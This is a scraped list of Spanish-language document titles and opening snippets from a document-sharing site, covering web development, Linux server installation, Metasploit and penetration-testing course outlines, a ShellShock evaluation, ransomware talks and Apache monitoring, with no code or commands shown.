Más detallesTecnologías de Desarrollo Web I N G. E N R I Q U E M A R T E L O L Ó P E Z U N I V E R S I D A D G E R A R D O B A R R I O S
Tecnologías de Desarrollo Web I N G. E N R I Q U E M A R T E L O L Ó P E Z U N I V E R S I D A D G E R A R D O B A R R I O S Arquitectura Web Básica Arquitectura Web Contenido Estático Arquitectura Web
Más detallesCurso de Metasploit v0.3.
Curso de Metasploit v0.3. Autor: Ignacio Sorribas Mollar Metasploit v0.3. Índice Índice... 2 Changelog.... 3 Introducción.... 4 Fases de un test de intrusión.... 4 Comenzando a utilizar Metasploit....
Más detalles[PENETRATION TESTING]
2012 [In]Seguridad Informática Caleb Bucker Pen-Tester Ethical Hacker Security Researcher http://calebbucker.blogspot.com http://www.twitter.com/calebdrugs https://www.facebook.com/caleb.bucker calebbucker@gmail.com
Más detallesInstructivo N 01 Instalar UBUNTU SERVER X en VM
Instructivo N 01 Instalar UBUNTU SERVER 14.04.X en VM Este instructivo posibilita la instalación de Ubuntu server como máquina virtual en un equipo orientado a desarrollo de software Web LAMP y tener independencia
Más detallesANEXO A MANUAL ADMINISTRADOR. Modulo Sistema
ANEXO A MANUAL ADMINISTRADOR Modulo Sistema 2017 1. INSTALAR XAMPP EN WINDOWS 7 Nota: Antes de instalar un servidor de páginas web es conveniente comprobar si no hay ya uno instalado. Para ello, es suficiente
Más detallesRawel E. Luciano B Sistema Operativo III 16- FIREWALL. José Doñe
Nombre: Rawel E. Luciano B. Matricula: 2011-2281 Materia: Sistema Operativo III How to: 16- FIREWALL Profesor: José Doñe FIREWALL Un firewall es un dispositivo que filtra el tráfico entre redes. El firewall
Más detallesA. Instalación de Mininet
A. Instalación de Mininet A.1 Consideraciones Previas En este anexo se detalla la instalación de Mininet en Mac OS X, Windows 7 y Ubuntu 14.04. Se necesitan las siguientes herramientas en las tres plataformas:
Más detallesHERRAMIENTAS PREVENTIVAS
HERRAMIENTAS PREVENTIVAS Configuración de contraseñas seguras: - En Windows: Políticas de directivas de cuentas. - En GNU/Linux: Módulo pam_cracklib. Windows Vamos a crear una política de contraseñas en
Más detallesManual técnico de Instalación
Manual técnico de Instalación Ovidio Enrique Padilla, Msc Coordinador de Tecnologías de Información y Comunicación Facultad de Ciencias Médicas, Biblioteca Médica Nacional Universidad Nacional Autónoma
Más detallesEvaluación del Ataque ShellShock
Evaluación del Ataque ShellShock William Sani, Roger Jaimes, y Jessenia Ramón williamwrsa@gmail.com, rogerj007@gmail.com, jessenia.ramonc@gmail.com Abstract Actualmente las aplicaciones Web son cada vez
Más detallesQuienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)
CON Quienes somos Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del
Más detallesAnatomía de un ataque ransomware
Anatomía de un ataque ransomware Jorge Córdova Pelayo Lima, 23 de noviembre de 2016 En seguridad, no existen segundas oportunidades Agenda Objetivos de la charla Qué es un ransomware? Cómo nos afecta?
Más detallesManual de Instalación en CentOS
Manual de Instalación en CentOS Versión 2 Enero 2015-1 - Índice de contenido 1. Paquetes de Software y archivos necesarios...3 1.1 Obtener permisos de root...3 2. Instalación de Sun Java JDK 6...3 3. Instalación
Más detallesQuímica computacional: Introducción a
Química computacional: Introducción a Linux y Jesús Hernández Trujillo Agosto de 2014 Linux & G09 Intro/JHT 1 / 10 Sistema operativo Linux Algunas características de Linux: Sistema operativo portable.
Más detallesActividad 10: Administración servidor Web HTTP (Apache2) en Ubuntu Server: Mods_status
Actividad 10: Administración servidor Web HTTP (Apache2) en Ubuntu Server: Monitorización y logs -- Pruebas de rendimiento. ESPERANZA ELIPE JIMENEZ Mods_status El módulo de estado permite que un administrador
Más detalles